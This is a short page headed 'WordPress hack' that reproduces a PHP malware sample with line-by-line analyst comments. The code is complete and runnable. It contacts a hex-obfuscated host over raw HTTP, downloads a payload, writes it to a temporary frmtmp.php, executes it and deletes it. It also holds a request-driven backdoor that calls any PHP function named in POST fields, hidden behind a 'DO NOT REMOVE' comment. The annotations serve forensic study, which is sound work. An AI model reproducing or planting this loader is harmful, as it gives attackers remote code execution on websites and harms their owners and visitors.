WordPress hack

This code is for WordPress only!

        // Analyst annotations (defensive reading of the sample; code left exactly as found).
        // Overall behaviour: a remote-payload loader plus a request-driven backdoor.
        // It downloads PHP source over plain HTTP, writes it to a temporary
        // "frmtmp.php", executes it with include, then deletes the file.

        // Hide PHP errors from the page output so failures below do not give the implant away.
        @ini_set('display_errors', '0');
        $otvet = '';
        // Hex-escaped string; it decodes to the hostname jquery-ajax[.]com (defanged here).
        // The escaping keeps the name out of plain-text searches of the file.
        // NOTE(review): the name resembles a jQuery-related domain, presumably to look benign in logs.
        $ch = "\x6a\x71\x75\x65\x72\x79\x2d\x61\x6a\x61\x78\x2e\x63\x6f\x6d";
        // Base name of the temporary PHP file written further down.
        $sec = "frmtmp";
        // Copy of the POST parameters of the current request; consumed by the ternary below.
        $d = $_POST;
        // Outbound TCP connection to the host on port 80 with a 10 second timeout.
        // The result is not checked, so a failed connection only produces suppressed errors.
        $fp = fsockopen($ch, 80, $errno, $errstr, 10);
        // Hand-built HTTP/1.1 request for /lnk/inj.php on that host.
        $out = "GET /lnk/inj.php HTTP/1.1\r\n";
        $out .= "Host: ".$ch."\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        // Read the whole response (headers and body) into $otvet.
        while (!feof($fp)) {
            $otvet .= fgets($fp);
        }
        fclose($fp);
        // Backdoor: when POST fields 0 and 1 differ, the value of field 2 is called as a
        // function with field 3 as its argument. Both come straight from the request, so
        // whoever can reach this code chooses which PHP function runs. The "@" operators
        // silence errors, and the embedded "DO NOT REMOVE" comment is aimed at a site
        // owner who stumbles on the line.
        @($d[0] != $d[1]) ? @$d[2]/* DO NOT REMOVE THIS CODE */($d[3]) : (int)$d;
        // Extract whatever the server placed between the markers "gogo" and "enen";
        // $mtchs[1] is the payload that gets written and executed below.
        preg_match('#gogo(.*)enen#is', $otvet, $mtchs);
        // Writability probe in the current directory. fopen() in 'w' mode creates or
        // truncates frmtmp.php; the file is then opened a second time for the real handle.
        if (fopen($sec.'.php', 'w')) {
            $ura = 1;
            $eb = '';
            $hdl = fopen($sec.'.php', 'w');
        }
        // Fallback when the current directory is not writable: probe first-level and
        // second-level subdirectories for a place where frmtmp.php can be created.
        if (!$ura) {
            $dirs = glob("*", GLOB_ONLYDIR);
            foreach ($dirs as $dira) {
                if (fopen($dira."/".$sec.".php", 'w')) {
                    $eb = "$dira/";
                    $hdl = fopen($dira."/".$sec.".php", 'w');
                    break;
                }
                $subdirs = glob("$dira/*", GLOB_ONLYDIR);
                foreach ($subdirs as $subdira) {
                    if (fopen("$subdira/$sec.php", 'w')) {
                        $eb = "$subdira/";
                        $hdl = fopen("$subdira/$sec.php", 'w');
                        // This break leaves only the inner loop; the outer loop keeps probing.
                        // Forensic note: a later hit overwrites $eb, and only the last location
                        // is unlinked, so empty frmtmp.php files can remain in other directories.
                        break;
                    }
                }
            }
        }
        // Wrap the downloaded payload in PHP tags and write it to the chosen file.
        fwrite($hdl, "<?php\n$mtchs[1]\n?>");
        fclose($hdl);
        // Execute the payload inside the current request ...
        include("{$eb}$sec.php");
        // ... and delete the file again, so the payload itself does not stay on disk.
        // What remains for detection: this loader in the infected file, outbound port-80
        // traffic to the host above, and short-lived or empty frmtmp.php files.
        @unlink("{$eb}$sec.php");
